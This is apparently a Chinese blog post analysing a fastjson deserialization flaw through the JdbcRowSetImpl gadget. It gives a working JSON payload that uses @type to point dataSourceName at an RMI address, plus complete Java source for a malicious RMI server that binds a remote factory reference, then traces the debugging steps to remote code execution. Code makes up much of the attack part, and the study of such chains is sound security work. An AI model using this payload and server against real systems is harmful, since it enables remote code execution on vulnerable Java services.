1. 程式人生 > >fastjson反序列化JdbcRowSetImpl

fastjson反序列化JdbcRowSetImpl

Gadget com.sun.rowset.JdbcRowSetImpl

 setAutoCommit() -> connect() -> InitialContext.lookup()

poc如下,dataSourceName 為rmi://localhost:1090/evil:

        String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","
                + "\"dataSourceName\":\"" + dataSourceName + "\","
                + "\"autoCommit\":\"true\"}";

RMIServer程式碼如下:

package org.lain.poc.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * @author: lanqihe
 * @Date: 下午8:01 2017/12/11
 * @Modified By:
 * @Description: 本地註冊一個register,並將惡意的類繫結
 */
public class RMIServer {


    public static void main(String argv[]) {

        try {
            Registry  registry =  LocateRegistry.createRegistry(1090);

            //如果通過rmi無法找到org.lain.poc.jndi.EvilObjectFactory,則嘗試從factoryLocation 獲取
            //因此,本地測試的話,如果factory正確,factoryLocation隨便填寫
            Reference reference = new Reference("EvilObject",
                    "org.lain.poc.jndi.EvilObjectFactory",
                    "http://localhost:9999/" );


            //客戶端通過evil查詢,獲取到EvilObject
            registry.bind("evil", new ReferenceWrapper(reference));

            System.out.println("Ready!");
            System.out.println("Waiting for connection......");

        } catch (Exception e) {
            System.out.println("RMIServer: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

除錯過程如下:
載入com.sun.rowset.JdbcRowSetImpl類
Alt text
poc中autoCommit設定為true.會呼叫setAutoCommit方法
Alt text
f7跟進connect方法,呼叫lookup方法
Alt text
繼續跟進getDataSourceName,呼叫我們的準備的惡意rmi服務類。通過lookup方法就例項化了惡意類,從而導致構造方法的惡意程式碼觸發。
Alt text

總結:fastjson @type的值傳入類,在解析json時,就會呼叫傳入屬性的getter,setter方法。如果找到一個類getter,setter能夠傳入可控的惡意class位元組碼或者是jdni服務,就能導致rce.

參考連結:
http://xxlegend.com/2017/12/06/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/